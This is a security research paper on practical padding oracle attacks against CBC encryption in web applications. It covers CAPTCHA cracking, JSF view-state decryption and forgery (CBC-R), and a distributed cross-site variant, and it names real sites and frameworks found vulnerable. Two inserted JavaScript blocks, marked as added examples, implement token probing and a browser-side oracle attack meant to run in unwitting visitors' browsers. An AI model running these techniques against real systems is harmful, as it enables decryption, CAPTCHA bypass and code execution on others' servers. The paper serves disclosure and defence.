Page 1: BlackHat-Practical Padding Oracle Attacks

Practical Padding Oracle Attacks

Juliano Rizzo∗ Thai Duong†

February 5th, 2010

Abstract

At Eurocrypt 2002, Vaudenay introduced a powerful side-channel attack, called the Padding Oracle attack, against CBC-mode encryption with PKCS#5 padding (see [6]). Given an oracle which, on receipt of a ciphertext, decrypts it and then tells the sender whether the padding is correct or not, he showed that one can efficiently decrypt data without knowing the encryption key. In this paper, we turn the Padding Oracle attack into a new set of practical web hacking techniques. Starting from the question of how to find Padding Oracles in real-life systems, we proceed to show how to crack various CAPTCHAs on popular web sites. Then we show how to decrypt view states in JavaServer Faces web development frameworks. We go on to extend the Padding Oracle attack by introducing CBC-R, a technique that allows attackers with access to a Padding Oracle to efficiently encrypt arbitrary plaintexts under the same key as that oracle. CBC-R permits us to mount the most interesting exploits, such as creating CAPTCHA graffiti for fun, or creating malicious view states to run arbitrary code in JavaServer Faces for profit. Then we show how to combine the Padding Oracle attack with cross-domain information leakage in web browsers to deploy a distributed Padding Oracle attack. We demonstrate that one can use this technique to map all ciphertexts to their corresponding plaintexts, hence break the underlying cryptosystem, in a fast, distributed manner. Finally, we describe several popular systems vulnerable to Padding Oracle attacks that we found during this research. We strongly believe that this is just the tip of the iceberg, and that the techniques we describe in this paper will uncover many more vulnerabilities for years to come.

1 Introduction

In this research, we show that widely used web development frameworks and web sites use encryption wrongly, in ways that allow attackers to read and modify data that should be protected. It has been known for years in the cryptography community that encryption is not authentication. If encrypted messages are not authenticated, data integrity cannot be guaranteed, which makes systems vulnerable to practical and dangerous chosen-ciphertext attacks, one of them being the Padding Oracle attack that Vaudenay presented at EuroCrypt 2002 (see [6]). As explained in Paterson and Yau's summary in [5], the Padding Oracle attack requires an oracle which, on receipt of a ciphertext, decrypts it and replies to the sender whether the padding is VALID or INVALID. The attack works under the assumption that the attackers can intercept padded messages encrypted in CBC mode, and have access to the aforementioned padding oracle. The result is that attackers can recover the plaintext corresponding to any block of ciphertext using an average of $128 \cdot b$ oracle calls, where $b$ is the number of bytes in a block. The easiest fix for the Padding Oracle attack is to encrypt-then-MAC, i.e. encrypt the information to get the ciphertext, then authenticate the ciphertext with a Message Authentication Code scheme. One can also use a cipher mode that combines both data confidentiality and data authenticity, such as CCM, OCB, EAX, or GCM^1. For more details on Vaudenay's attack and suggested fixes, please see [7, 1, 3, 4, 5].

∗ http://netifera.com, [email protected]
† http://vnsecurity.net, [email protected]

In Section 2, we describe manual and automated testing techniques to find Padding Oracles in real-life systems. In Section 3, we describe basic Padding Oracle attacks to crack CAPTCHAs and decrypt secret data of popular web sites and web development frameworks. In Section 4, we introduce advanced Padding Oracle attacks that allow us to mount the most interesting exploits, such as creating CAPTCHA graffiti for fun, or creating malicious view states to run arbitrary code in JavaServer Faces for profit. In Section 5, we list several popular web development frameworks and web sites that are vulnerable to Padding Oracle attacks, including but not limited to eBay Latin America, Apache MyFaces, SUN Mojarra, Ruby On Rails, and OWASP ESAPI. We conclude in Section 6.

2 Finding Padding Oracles

If you start looking today, you will see that Padding Oracles are pervasive. They are everywhere, like SQL Injection or Cross Site Scripting. This is because few people believe that attackers can decrypt their encrypted secrets if they leak just 1 bit of information. Unfortunately, the reality is that if you somehow let attackers know whether or not an error occurred while you decrypted something, then they can decrypt your messages. In short: leak 1 bit, and you are 0wn3d.

^1 See http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation for links to the relevant RFCs and papers on these modes.


2.1 Manual Testing

We have been using three methods to find Padding Oracles:

Black-box Testing We crawl the target web site to find Base64 strings, which can be found in hidden fields, cookies, or request parameters^2. Then we decode each Base64 string found. If the result looks random, and its length is a multiple of a common block cipher size, i.e. 8, 16 or 32 bytes, then there is a good chance that it is a ciphertext. We also look for common separators, i.e. --, | or :, which are often used to separate IV, ciphertext, or MAC. Then we replace a byte in the last block of the ciphertext with a random value, send it back to the target, and see what changes in the response. If there is an error message, then there is a high chance that this is a Padding Oracle. Even a blank page is enough information to perform this attack.
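As an added example (not part of the paper or of POET), the following Node.js script performs this black-box triage on harvested tokens: it decodes standard and URL-safe Base64, splits on the common separators, flags blobs that are random-looking and a whole number of 8/16/32-byte blocks, and produces the mangled-last-block token to send back. The sample tokens at the bottom are constructed for the example.

```javascript
// Added example: black-box triage of tokens harvested from hidden fields,
// cookies and URL parameters. Node.js only; sample tokens are constructed.
const BLOCK_SIZES = [8, 16, 32];          // block sizes worth checking
const SEPARATORS = ['--', '|', ':'];      // common IV / ciphertext / MAC separators

// Decode standard or URL-safe Base64, tolerating stripped '=' padding.
// Returns null if the string is not Base64 at all.
function tryBase64(s) {
  const norm = s.replace(/-/g, '+').replace(/_/g, '/').replace(/=+$/, '');
  if (norm.length < 4 || !/^[A-Za-z0-9+/]+$/.test(norm)) return null;
  const padded = norm + '='.repeat((4 - (norm.length % 4)) % 4);
  const buf = Buffer.from(padded, 'base64');
  return buf.length > 0 ? buf : null;
}

// "Looks random" here means: neither printable text nor a known serialisation
// header. Ciphertext has neither property.
function isPrintableText(buf) {
  return buf.every((b) => (b >= 0x20 && b < 0x7f) || b === 0x09 || b === 0x0a || b === 0x0d);
}
const KNOWN_HEADERS = [
  Buffer.from([0xac, 0xed]),   // Java object serialization stream
  Buffer.from([0x1f, 0x8b]),   // gzip
  Buffer.from([0x78, 0x9c]),   // zlib, default compression level
];
function hasKnownHeader(buf) {
  return KNOWN_HEADERS.some((h) => buf.subarray(0, h.length).equals(h));
}

function classifyBlob(buf) {
  const blockSizes = BLOCK_SIZES.filter((b) => buf.length % b === 0);
  const printable = isPrintableText(buf);
  const header = hasKnownHeader(buf);
  // candidate ciphertext: random-looking AND a whole number of blocks
  return { length: buf.length, blockSizes, ciphertextLike: !printable && !header && blockSizes.length > 0 };
}

// Triage one token. Tries the separator layouts first (IV|ct, ct--mac, ...),
// then falls back to a single Base64 blob. Returns null for non-Base64 input.
function triageToken(token) {
  for (const sep of SEPARATORS) {
    const parts = token.split(sep);
    if (parts.length < 2) continue;
    const blobs = parts.map(tryBase64);
    if (blobs.every(Boolean)) return { separator: sep, parts: blobs.map(classifyBlob) };
  }
  const blob = tryBase64(token);
  return blob ? { separator: null, parts: [classifyBlob(blob)] } : null;
}

// The probing step: flip one byte in the last block and re-encode, so the
// token can be sent back and the response compared with the original.
function mangleLastBlock(token, blockSize, byteInBlock = blockSize - 1, xorWith = 0x01) {
  const blob = tryBase64(token);
  if (!blob || blob.length < blockSize) throw new Error('token is not a Base64 blob of at least one block');
  const buf = Buffer.from(blob);                       // copy; tryBase64 result stays intact
  buf[buf.length - blockSize + byteInBlock] ^= xorWith;
  return buf.toString('base64');
}

// Constructed samples: 32 random-looking bytes, a plaintext cookie, an IV|ct
// pair, and a 30-byte blob that cannot be CBC output.
const SAMPLE_CT = Buffer.from('9c2be417f05a8d3371c6e2b9044fa6d85e0d7b1ac3f948266f91bd03a78e5c12', 'hex').toString('base64');
const SAMPLE_PLAIN = Buffer.from('user=alice;role=admin').toString('base64');
const SAMPLE_IV_CT = Buffer.alloc(16, 0xa5).toString('base64') + '|' + SAMPLE_CT;
const SAMPLE_ODD = Buffer.from('9c2be417f05a8d3371c6e2b9044fa6d85e0d7b1ac3f948266f91bd03a78e', 'hex').toString('base64');

for (const t of [SAMPLE_CT, SAMPLE_PLAIN, SAMPLE_IV_CT, SAMPLE_ODD]) console.log(JSON.stringify(triageToken(t)));
```

The randomness test is deliberately crude: "not printable text and not a gzip/zlib/Java-serialization header" is enough to separate ciphertext from the cookies one actually meets. A blob that is random-looking but whose length is not a multiple of any block size is more likely a hash, a MAC or stream-cipher output, and is not a CBC padding oracle target.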

Google Hacking We also look for known error messages and standard API exceptions. In Java, the error message is "Given final block not properly padded", and the standard exception is javax.crypto.BadPaddingException. Other platforms and crypto libraries provide different error messages and API exceptions. Just by googling these messages, we promise, you can find tons of interesting Padding Oracles.

Source Code Auditing Another way is to look for known source code keywords. You can start by looking for code that imports low-level cryptography libraries such as:

C/C++: OpenSSL, Crypto++

Python: PyCrypto, M2Crypto

.NET: .NET Cryptography, Microsoft CryptoAPI

Java: Java Crypto Extension, BouncyCastle

Then look for routines that perform encryption and decryption. If there is some code to handle errors while decrypting, and/or no sign of MAC usage, then there is a high probability that you have found a target for the Padding Oracle attack.

Regardless of which method one uses, the most important thing is to analyse and understand the meaning of the error messages returned by the target upon receiving mangled ciphertexts. In short, you need to know when the padding is VALID, and when it is INVALID.

^2 A funny side effect of doing this research is that now both of us are obsessed with Base64 strings. Every time we see a Base64 message, we decode it, and if it's not plaintext, we assume it is a ciphertext, then go on trying to decrypt it using the Padding Oracle attack. It's really fun!


2.2 Automated Testing

After doing some manual testing, one usually needs an automated tool to confirm the existence of Padding Oracles. By changing the ciphertext randomly, the ultimate goal of automated tools is to force the target to reveal as many different reactions to the modified messages as possible. We are going to release POET, a.k.a. Padding Oracle Exploitation Tool^3, which finds and exploits Padding Oracles automatically.

If you want to write your own tool to detect Padding Oracles, you can follow this guideline, which is very similar to the last-word decryption algorithm that Vaudenay described in his seminal paper (see [6, Section 3.1]):

1. Pick random bytes $r_1, \ldots, r_b$, where $b$ denotes the cipher block size, and set $i = 0$.

2. Let $r = r_1 | \ldots | r_{b-1} | (r_b \oplus i)$, where $|$ denotes concatenation.

3. Send $r | y$ to the target web site, where $y$ is a valid ciphertext block that you found during the manual testing phase. Record the value of $i$, and the content length and content type of the response. Increment $i$, and go back to step 2 until $i > 255$.

4. Now you have 256 responses. If all of them are the same, then it is bad news: the target is not easily showing you that it is vulnerable to the Padding Oracle attack. Otherwise, look at each value of $i$ where the response differs from the rest. Manually resend each corresponding $r | y$, and examine each response carefully to see what happens.

A final note: people often use one global crypto key and a fixed IV to encrypt everything, so if attackers find a Padding Oracle, they can use it to decrypt all data encrypted under that key and IV.

3 Basic Padding Oracle Attacks

Since HTTP is a stateless protocol, web developers must either manage state on the server, or push it to the client. For performance and scalability reasons, most web developers tend to go with the latter. They want to keep the state secret, and turn to cryptography, which is the right tool. However, they use it wrongly, i.e. they neither authenticate the ciphertext nor use an authenticated block cipher mode, and so make their systems vulnerable to the Padding Oracle attack.

In this section, we show two basic Padding Oracle attacks:

• Cracking CAPTCHA systems.

• Decrypting JavaServer Faces view states.

^3 POET has probably been released by the time you read this paper. You can download it at http://netifera.com/research

3.1 Cracking CAPTCHA

CAPTCHA is the most popular technique to prevent computer programs from submitting automated requests to web servers. A common type of CAPTCHA requires that users enter an alphanumeric code from a distorted image. We found that some crypto-based CAPTCHA systems are probably the simplest examples of Padding Oracle attacks.

A vulnerable CAPTCHA system works as follows:

1. The server generates a random code, and encrypts it in CBC mode under some key $K$ and some IV:

$ERC = E_{K,IV}(\mathrm{rand}())$

2. This ERC is used as a parameter for some captcha.jsp^4 which, upon receipt of an ERC, decrypts it and generates a distorted image. If an HTML form needs to show a CAPTCHA, it just puts something like /captcha.jsp?token=ERC into an <img> tag to load the distorted image.

3. ERC is stored either as a hidden field in the CAPTCHA form or as a cookie, so once a user submits, it is sent back to the server.

4. The server then decrypts ERC, and compares it with the code that the user has entered. If they are equal, the server accepts the request; otherwise it denies the request.

Because captcha.jsp decrypts any ERC sent to it, it is vulnerable to the Padding Oracle attack. As we discussed in Section 2, the only remaining problem is to know when the padding is VALID, and when it is not.

Fortunately, most CAPTCHA systems send back an error notification when they fail to decrypt ERC, i.e. when the padding is INVALID. Some servers send either empty responses or HTML with an error message. In addition, when you modify ERC so that the padding is VALID, captcha.jsp displays an image with a broken code.

If things work out that way, attackers now have a Padding Oracle, and they can use it to decrypt any ERC to get its random code, hence bypass the CAPTCHA protection completely.

^4 Please note that what we describe here works for any platform and language; we just use Java/JSP as an example.


CAPTCHA with secret IV Since

$P_0 = IV \oplus D_{\text{PaddingOracle}}(C_0)$

attackers need to know the IV to be able to get $P_0$. In other words, if the IV is secret, one cannot know $P_0$, and cannot crack CAPTCHA systems whose $P_0$ contains part of the random code.

Fortunately, for those CAPTCHA systems that we found during this research, the IV can be recovered easily with human intervention. Most of the time the text shown in the CAPTCHA image is exactly $P_0$, so if attackers know $D_{\text{PaddingOracle}}(C_0)$, then they can compute the secret IV as follows:

$IV = Human \oplus D_{\text{PaddingOracle}}(C_0)$

where $Human$ denotes that somebody reads $P_0$ from the CAPTCHA image. This is very useful for attacking CAPTCHA systems where manually discovering the IV a single time allows one to decrypt any new challenge, given that the IV does not change, without any further human intervention.

3.2 Decrypting JSF view states

JavaServer Faces introduces a powerful and flexible system for saving and restoring the state of the view between requests to the server. JSF implementations support two primary mechanisms for saving state, based on the value of the javax.faces.STATE_SAVING_METHOD initialization parameter. If this parameter is set to client, the saved state is included in the rendered markup that is sent to the client (such as in a hidden input field for HTML). The state information must be included in the subsequent request, making it possible for JSF to restore the view without having saved information on the server side.

Although the JSF specification advises that state information should be encrypted and tamper-evident, as far as we know no implementation follows that advice. Some frameworks such as SUN Mojarra and Apache MyFaces do encrypt state information, but they don't protect the integrity of encrypted states, which makes them vulnerable to Padding Oracle attacks.

By default, all JSF frameworks display a very detailed error message if they fail to decrypt a view state, which makes the Padding Oracle very obvious: if one sees javax.crypto.BadPaddingException, then it's INVALID padding; it's VALID padding otherwise.

Most JSF frameworks allow developers to turn off error messages. Then attackers can use the following simple trick. Say an attacker wants to decrypt block $C_i$ of an encrypted view state $C_0 | C_1 | \ldots | C_{n-1}$. They append $C_{random} | C_i$ to create $C_0 | C_1 | \ldots | C_{n-1} | C_{random} | C_i$, and send this message to the server. Since the padding check only inspects the final block, and Java ignores the trailing bytes while deserializing the view state, one can safely bet that it's VALID padding if the server returns the same page as when the view state is unaltered. It's probably INVALID padding if one sees something else, e.g. an HTTP 500 error message.

Figure 1: Apache MyFaces error-page

View states usually do not contain very sensitive data, but it is important to stress that some frameworks save to the client not only the view, but also the entire managed beans, which could possibly contain confidential data^5.

4 Advanced Padding Oracle Attacks

4.1 Using Padding Oracles to Encrypt

A Padding Oracle is all attackers need to decrypt messages. But can a Padding Oracle help if their goal is to encrypt messages? The short answer is yes. We designed the following technique, which allows one to use a Padding Oracle to encrypt messages of any length under the same key as the Padding Oracle. It is very simple, but we have not seen it published before, which is surprising given the fruitful consequences of this finding. We call it CBC-R encryption, and Section 4.1.2 shows that CBC-R has permitted us to mount the most interesting exploits.

^5 For Apache MyFaces, see http://wiki.apache.org/myfaces/SaveState


Figure 2: Decrypted Apache MyFaces view state

4.1.1 CBC-R Encryption

CBC-R turns a decryption oracle into an encryption oracle^6. We all know that CBC decryption works as follows:

$P_i = D_K(C_i) \oplus C_{i-1}$

with $C_{-1} = IV$, so that the indices match Figure 3 and Section 3, where $C_0$ is the first ciphertext block.

Look at the XOR operation. It takes two operands: one is the previous ciphertext block $C_{i-1}$, which is controlled by attackers, and the other is the intermediate plaintext block of the current ciphertext block, $D_K(C_i)$. Attackers don't have access to $K$, but they can use a Padding Oracle to get $D_K(C_i)$. In other words, attackers can make that XOR operation produce any plaintext block $P_i$ they want.

The process is simple. Attackers take one random ciphertext block, call it $C_i$. Any random block will work. They send that block to the Padding Oracle to get its intermediate plaintext; call this operation $D_{\text{PaddingOracle}}(C_i)$. Since

$P_i = C_{i-1} \oplus D_{\text{PaddingOracle}}(C_i)$

and attackers control $C_{i-1}$, they can make $P_i$ equal to anything they want. But doesn't this garble $P_{i-1}$? Yes, but attackers can fix $P_{i-1}$ by sending $C_{i-1}$ to the Padding Oracle to get its intermediate plaintext, and setting:

$C_{i-2} = P_{i-1} \oplus D_{\text{PaddingOracle}}(C_{i-1})$

^6 Please note that a Padding Oracle is just one kind of decryption oracle that works well with CBC-R.


1. $C_{n-1} = \text{random}$

2. for $i = n-1$ down to $1$:

   $C_{i-1} = P_i \oplus D_{\text{PaddingOracle}}(C_i)$

3. $IV = P_0 \oplus D_{\text{PaddingOracle}}(C_0)$

Figure 3: CBC-R pseudocode

Figure 4: CBC-R Encryption

Now they have two consecutive plaintext blocks of their choice, and a leading garbled block that they can correct by inserting a new ciphertext block. Repeating this operation, they can efficiently encrypt a complete message block by block, starting from the last one. Since the first block of the CBC ciphertext stream depends on the IV, if attackers can set the IV, then the decrypted data will be exactly what they want, without any garbled block. If attackers don't control the IV, then the first block is garbled. In the next paragraph, we discuss what attackers can do if they don't control the IV.

CBC-R Without Controlling IV Different cryptosystems handle the IV in different ways. The IV can be a prefix of the ciphertext, and totally controllable by attackers, or a fixed well-known value that attackers cannot change. Cryptosystems also use secret IVs, and then either change them every once in a while, or set them to a fixed static value.

We said that CBC-R allows attackers to encrypt any message, but if they cannot set the IV, the first plaintext block will be random and meaningless. If the victim expects the decrypted message to start with a standard header, and attackers don't control the IV, then the victim will reject the forged message constructed by CBC-R. This is what happens with compressed data and Java serialized object streams, to name a few.

This limitation could prevent some of the highest-impact attacks, and we have not found a generic way to overcome it. However, we have found workarounds for particular cases.

Using Captured Ciphertext As Prefix If attackers capture a ciphertext whose plaintext is a valid message, then they can prepend that ciphertext to their CBC-R encrypted message to get a valid header after decryption:

$P_{valid} = D_K(C_{captured} \,|\, IV_{CBC\text{-}R} \,|\, C_{CBC\text{-}R})$

The resulting forged plaintext message will have a valid header, but it still has a garbled block at the position of $IV_{CBC\text{-}R}$, because that block is now decrypted as ciphertext and XORed with the last block of $C_{captured}$. This broken block can still make the victim reject the message, but we can make the victim ignore it if we choose the prefix carefully, i.e. so that the garbled block becomes part of some string that doesn't affect the semantics of the message, such as a comment or a textbox label.

Brute-Forcing $C_0$ In CBC-R, the final block $C_{n-1}$ is a random block (see Figure 3). Each different $C_{n-1}$ yields a different $C_{n-1}, \ldots, C_0$ chain. In other words, CBC-R can produce many different ciphertexts that decrypt to the same plaintext block chain $P_{n-1}, \ldots, P_1$. The only difference is the first plaintext block, which is computed as follows:

$P_0 = D_K(C_0) \oplus IV$

Attackers want $P_0$ to contain a valid header. In some systems, this means that the first few bytes of $P_0$ must match some magic numbers. There are also systems that accept a message if the first byte of its $P_0$ matches its size. If this is the case, and if the message is short enough, attackers can try their luck by brute-forcing $C_0$.

The idea is simple: attackers change $C_{n-1}$, hence change $C_0$, until they get a valid $P_0$. For example, if the first byte of $P_0$ must match the message size, one needs to try on average 256 different CBC-R ciphertexts to obtain a valid message, and each attempt re-runs the whole CBC-R chain through the oracle. For longer messages or more complex message validation rules, brute-forcing is not practical.

4.1.2 CBC-R Applications

sudo make me a CAPTCHA Since CBC-R can encrypt arbitrary messages of any length, one can use it to create arbitrary CAPTCHA graffiti for fun ;-). Check out Figure 5^7 and Figure 6^8.

Figure 5: PWN3D CAPTCHA powered by CBC-R

Creating Malicious JSF view states It's easy to see that attackers can use CBC-R to create malicious view states that in the worst case could allow them to execute code on vulnerable JSF systems. The two remaining questions are:

• Which view states to create?

• How to solve the garbled block problem?^9

For the first question, the book on Apache MyFaces and Facelets technology observed that (see [8]):

[...] When the HTML form is submitted it carries the view state value back to the server in the form of an HTTP parameter. JSF uses the value of this parameter to reconstruct the view during the restore view phase. The view is restored by reversing the process used to obtain the view state: it is decoded and deserialized. This poses a major security challenge to any JSF implementation because Sean has the freedom to change the view state. He can toggle the rendered attribute of UI controls that are not supposed to be available to him. He can point a commandButton to a method on any managed bean in the application. He can circumvent an action listener.

^7 See http://bit.ly/pwn3dCAPTCHA
^8 See http://bit.ly/0wn3dCAPTCHA (please note that this CAPTCHA was not made by CBC-R ;-)
^9 We have to solve this problem because we don't control the IV of most JSF frameworks.

Figure 6: 0WN3D CAPTCHA

While we were writing this paper, a researcher published an advisory describing vulnerabilities in Apache MyFaces and SUN Mojarra, and claimed that (see [2])^10:

[...] it is possible for an attacker to supply a new or modified view object as part of a request. The malicious view can contain arbitrary HTML code (allowing Cross-Site Scripting), and arbitrary Expression Language (EL) statements that will be executed on the server. The EL statements can be used to read data stored in user-scoped session variables, and application or server-scoped variables. Since these variables should be inaccessible by the user, it is not uncommon to store sensitive data in them.

^10 It's important to stress that the authors of [8] and [2] were wrong when they suggested that encrypting view states would solve the attacks they described.


As a result, we know which view states to create. For the second question, it depends on the content of JSF view states, which are Java Object Serialization Streams^11. The generic solution is to use the technique described in Section 4.1.1 to prepend a known valid ciphertext to our CBC-R encrypted view state^12, and make the garbled block become part of a string that doesn't affect the semantics of the view state, such as a textbox label.

Please note that although we attack only JSF view states, our techniques can be applied to exploit other kinds of state information in different formats, such as XML, serialized objects, JSON, or simply comma-separated variable-value pairs.

4.2 Distributed Cross-Site Padding Oracle Attack

As we have demonstrated up to this point, all attackers need to exploit a Padding Oracle is a single bit of information. If a web site leaks that 1 bit of information, then there are a lot of ways for attackers to obtain it using cross-domain information leakage bugs in web browsers.

If you are familiar with web browser security, you probably know that JavaScript at evil.com cannot read the response to a request to victim.com; otherwise this would allow all kinds of abuses by evil web sites. But there is nothing to stop evil.com from referencing resources on victim.com, observing how the server responds, and deducing information.

Using an <img> tag plus the onerror()/onload() events, JavaScript at evil.com can make web browsers load an image at victim.com, and learn whether the image loaded or not. This is 1 bit of information, and as you know, it is enough for the Padding Oracle attack to work: if the image loads, then it's VALID padding; otherwise, it's INVALID padding.

This technique has allowed us to successfully decrypt all CAPTCHAs on a target web site using only JavaScript hosted on a different server^13. If a target is interesting enough, attackers could inject JavaScript code into popular web sites, and when people visit those web sites, the code will run in their browsers and use their CPU time and Internet connections to decrypt the target's secrets. It is possible to build a code book in a distributed manner, i.e. a mapping of ciphertexts to the corresponding plaintexts under the same key and IV as the Padding Oracle. This code book in turn can be used to automatically bypass CAPTCHA protection with 100% accuracy regardless of the graphical complexity.

^11 See http://java.sun.com/j2se/1.5.0/docs/guide/serialization/spec/protocol.html#8101
^12 All JSF view states start with the same known header. See Figure 2.
^13 Watch it at http://www.youtube.com/watch_private?v=e46A-PUpDvk&sharing_token=ZaLFKwi0ipTWzw_2vThJSA (you need to log in to YouTube)
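The following is an added example (not code from the paper) of the attacker-side JavaScript that runs in visitors' browsers: it builds the probe URL, turns the onload/onerror events of a cross-origin <img> into the oracle bit, and recovers the last byte of $D_K(block)$ with all 256 candidate probes in flight at once, which is where the browser's parallel image loading pays off. The target endpoint https://victim.example/captcha.jsp?token=... and its image-or-error behaviour are assumptions for the example; the remaining bytes of the block are recovered the same way as in Section 3, with this oracle in place of a direct HTTP client.

```javascript
// Added example: the evil.com side of the distributed attack. The target URL
// and its image-or-error behaviour are assumptions, not taken from the paper.
const CAPTCHA_URL = 'https://victim.example/captcha.jsp?token=';   // hypothetical endpoint

// Base64 of a byte array without Buffer, so this runs in a browser.
function toBase64(bytes) {
  return btoa(String.fromCharCode(...bytes));
}

// Probe URL for the forged pair prev|block: prev plays the IV / previous
// ciphertext block, block is the captured ciphertext block under attack.
function probeUrl(prev, block) {
  const both = new Uint8Array(prev.length + block.length);
  both.set(prev, 0);
  both.set(block, prev.length);
  return CAPTCHA_URL + encodeURIComponent(toBase64(both));
}

// Browser only. The same-origin policy stops us reading the response, but
// onload versus onerror tells us whether the server produced an image: 1 bit.
function imageLoads(url) {
  return new Promise((resolve) => {
    const img = new Image();
    img.onload = () => resolve(true);
    img.onerror = () => resolve(false);
    img.src = url;
  });
}

// Wrap any "does this URL load" probe into the oracle shape the attack needs:
// (prev, block) -> Promise<boolean>. In the browser pass imageLoads.
function oracleFromProbe(probe) {
  return (prev, block) => probe(probeUrl(prev, block));
}

// Recover the last byte of D_K(block): fire all 256 candidates at once, then
// rule out 0x02 0x02 (and longer) false positives by disturbing the byte
// before the last one; only genuine 0x01 padding survives that.
async function recoverLastByte(block, oracle) {
  const n = block.length;
  const candidates = Array.from({ length: 256 }, (_, g) => {
    const prev = new Uint8Array(n);
    prev[n - 1] = g;
    return prev;
  });
  const results = await Promise.all(candidates.map((prev) => oracle(prev, block)));
  for (let g = 0; g < 256; g++) {
    if (!results[g]) continue;
    const check = Uint8Array.from(candidates[g]);
    check[n - 2] ^= 0xff;
    if (await oracle(check, block)) return g ^ 0x01;   // D_K(block)[n-1]
  }
  throw new Error('no valid padding found: not a padding oracle?');
}
```

imageLoads is browser-only; everything else also runs under Node.js, which is how the oracle can be exercised against a fake server. In a real deployment each visitor would be handed a slice of the captured ciphertext blocks and would report the recovered intermediate values back, which is the code book described above.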


5 Some Vulnerable Systems

Below are several web development frameworks and web sites vulnerable to Padding Oracle attacks that we found during this research. Due to time constraints, we looked only at popular systems, i.e. web sites with a large number of customers, and frameworks with a large number of developers. We strongly believe that this is just the tip of the iceberg, and that the techniques we describe in this paper will uncover many more vulnerabilities for years to come.

5.1 Broken CAPTCHA systems

MercadoLibre.com, a.k.a. eBay Latin America, is Latin America's number-one e-commerce site, with more than 40 million registered users that buy and sell products. We found that MercadoLibre's CAPTCHA^14 can be cracked by using the technique described in Section 3.1. Please note that MercadoLibre's CAPTCHA uses a secret IV, so one needs to manually recover the secret IV before automating the CAPTCHA cracking process.

BIDZ.com is a leading online retailer of jewelry that is ranked 5th amongst auction sites according to Alexa. We found that attackers can crack BIDZ's CAPTCHA^15 using the technique described in Section 3.1. Since attackers can control the IV of BIDZ's CAPTCHA, they can apply the CBC-R technique to create CAPTCHA graffiti for fun (see Figure 5). We also use BIDZ as the target to demonstrate the power of a distributed Padding Oracle attack, as described in Section 4.2^16.

5.2 Broken JSF implementations

There are probably a handful of JSF implementations out there, but we don't have time to test all of them, so we focus on the two most popular, which are Apache MyFaces and SUN Mojarra. Both of them can be attacked using the techniques described in Section 3.2 and Section 4.1.2.

5.3 Others

5.3.1 Ruby On Rails

Ruby On Rails^17, which was created in 2003, is probably the most widely used web development framework in the world. Since version 2.3, Ruby On Rails has included ActiveSupport::MessageEncryptor^18, which is a set of functions "to provide a simple way to encrypt information for storage in an untrusted location (like cookies)."^19 If you look at ActiveSupport::MessageEncryptor's source code, you will probably see that applications that use the provided encrypt/decrypt functions are vulnerable to Padding Oracle attacks. It's ironic that the developers of ActiveSupport::MessageEncryptor do provide a secure pair of functions to encrypt/decrypt data that are not vulnerable to Padding Oracle attacks, but they still keep the vulnerable ones to confuse their users.

^14 See http://www.mercadolibre.com.ar/jm/reg
^15 See http://www.bidz.com/bzJApp/ViewCustomerLoginForm.action
^16 Watch the screencast at http://www.youtube.com/watch_private?v=e46A-PUpDvk&sharing_token=ZaLFKwi0ipTWzw_2vThJSA (you need to log in to YouTube)
^17 See http://www.rubyonrails.org

5.3.2 OWASP ESAPI

OWASP ESAPI^20, which stands for OWASP Enterprise Security API Toolkits, is a project that claims to "help software developers guard against security-related design and implementation flaws." However, we found that all versions of OWASP ESAPI for Java up to 2.0 RC2 are vulnerable to Padding Oracle attacks^21. There were some significant changes in the ESAPI Encryption API since 2.0 RC3^22. Unfortunately, while these changes are heading in the correct direction, i.e. authenticating the ciphertext or using an authenticated encryption mode, at the time of this writing there are still some bugs in the latest implementation^23 that make applications using ESAPI for Java vulnerable to Padding Oracle attacks. We leave the finding of these bugs as an exercise for readers.

6 Conclusion

Nate Lawson^24 once said^25:

[...] If you find yourself needing to implement crypto, it's likely you can avoid it by thinking about the situation differently. For example, many web developers get seduced into designing their own crypto as a way to push state to the client instead of managing it on the server. This opens up a much wider attack surface on the server application since now every part of that blob needs to be considered malicious. As the saying goes, "... now you have two problems."

The reason all this is so hard is that crypto is fundamentally unsafe. People hear that crypto is strong and confuse that with safe. Crypto can indeed be very strong but is extremely unsafe.

^18 See http://api.rubyonrails.org/classes/ActiveSupport/MessageEncryptor.html
^19 See http://guides.rails.info/2_3_release_notes.html
^20 See http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
^21 See http://owasp-esapi-java.googlecode.com/svn/trunk_doc/1.4.4/org/owasp/esapi/reference/JavaEncryptor.html
^22 See http://owasp-esapi-java.googlecode.com/svn/trunk/documentation/esapi4java-core-2.0-readme-crypto-changes.html
^23 See http://owasp-esapi-java.googlecode.com/svn/trunk/src/main/java/org/owasp/esapi/reference/crypto/JavaEncryptor.java
^24 http://www.root.org
^25 http://news.ycombinator.com/item?id=621227

We can't agree more with Nate. Even the OWASP folks cannot get crypto right, so how can an average Joe do so? Crypto is difficult and expensive to get right. On the other hand, there are good high-level libraries available. Sure, there are a few cases where you have to do custom development, incurring that cost. But making "roll your own" the default development practice is like coding your own webserver in assembly. You can eventually get it right, but you're making your job much harder than it has to be and risking a lot for your company for no real gain.

7 Acknowledgments

References

[1] J. Black and H. Urtubia. Side-Channel Attacks on Symmetric Encryption Schemes: The Case for Authenticated Encryption. In Proceedings of the 11th USENIX Security Symposium, San Francisco, CA, USA, August 5-9, 2002, pages 327–338. USENIX, 2002.

[2] D. Byrne. "Multiplatform View State Tampering Vulnerabilities". Trustwave's SpiderLabs. 8 Feb. 2009. Trustwave. 24 Feb. 2009. https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt

[3] B. Canvel, A. Hiltgen, S. Vaudenay, and M. Vuagnoux. Password Interception in a SSL/TLS Channel. In Proc. CRYPTO 2003, D. Boneh (ed.), LNCS Vol. 2729, pp. 583–599, 2003.

[4] V. Klima and T. Rosa. Side Channel Attacks on CBC Encrypted Messages in the PKCS#7 Format. Cryptology ePrint Archive, Report 2003/098, 2003.

[5] K. G. Paterson and A. Yau. Padding Oracle Attacks on the ISO CBC Mode Padding Standard. In T. Okamoto, editor, Topics in Cryptology — CT-RSA 2004, volume 2964 of Lecture Notes in Computer Science, pages 305–323. Springer-Verlag, 2004.

[6] S. Vaudenay. Security Flaws Induced by CBC Padding — Applications to SSL, IPSEC, WTLS... In L. Knudsen, editor, Advances in Cryptology — EUROCRYPT 2002, volume 2332 of Lecture Notes in Computer Science, pages 534–545. Springer-Verlag, 2002.

[7] A. K. L. Yau, K. G. Paterson, and C. J. Mitchell. Padding Oracle Attacks on CBC-Mode Encryption with Secret and Random IVs. In H. Gilbert and H. Handschuh, editors, Proceedings of FSE 2005, volume 3557 of LNCS, pages 299–319. Springer-Verlag, 2005.

